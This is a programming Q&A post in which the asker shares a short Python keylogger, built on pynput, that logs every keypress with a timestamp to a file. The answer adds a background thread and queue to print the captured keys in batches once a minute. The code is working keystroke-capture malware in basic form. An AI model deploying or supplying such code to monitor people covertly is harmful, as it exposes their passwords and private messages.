# Python Keylogger printing out logged Characters in an Interval

Tags: python, logging, pynput

So I basically made a Keylogger in Python but I want the the Logged Characters to be printed out in the Console in an interval, for example every minute (or which is harder, every 15 characters). But i dont know how to, first: save the logged Keys as a string that can be printed out and second how to print it out in an interval.

Here the Code:

```
from pynput.keyboard import Key, Listener
import logging

logging.basicConfig(filename='log.txt', level=logging.INFO, format='%(asctime)s: %(message)s')


def on_press(key):
    logging.info(key)


with Listener(on_press=on_press) as listener:
    listener.join()
```

The printed out log should look like this (the same as in the file):

```
2020-06-14 23:50:00,875: 'E'
2020-06-14 23:50:01,575: 'x'
2020-06-14 23:50:01,918: 'a'
2020-06-14 23:50:02,464: 'm'
2020-06-14 23:50:03,225: 'p'
2020-06-14 23:50:03,464: 'l'
2020-06-14 23:50:03,765: 'e'
```

Answer (score 0):

I recommend setting up a background thread.  You can pass objects to it using a `Queue`.

```
import threading
import queue
import time

def emptyQueue(q):
    letters = []
    while not q.empty():
        letters.append(q.get())

    if letters:
        logging.info(', '.join(letters))

def backgroundLogger(q, shouldEnd):
    while not shouldEnd.wait(60):
        emptyQueue(q)

    emptyQueue(q)

q = queue.Queue()
killBackground = threading.Event()
t = threading.Thread(target=backgroundLogger, args=(q, killBackground))
t.start()
```

You would then change your `with` line to

```
with Listener(on_press=q.put) as listener:
```

When your program is done, run

```
killBackground.set()
t.join()
```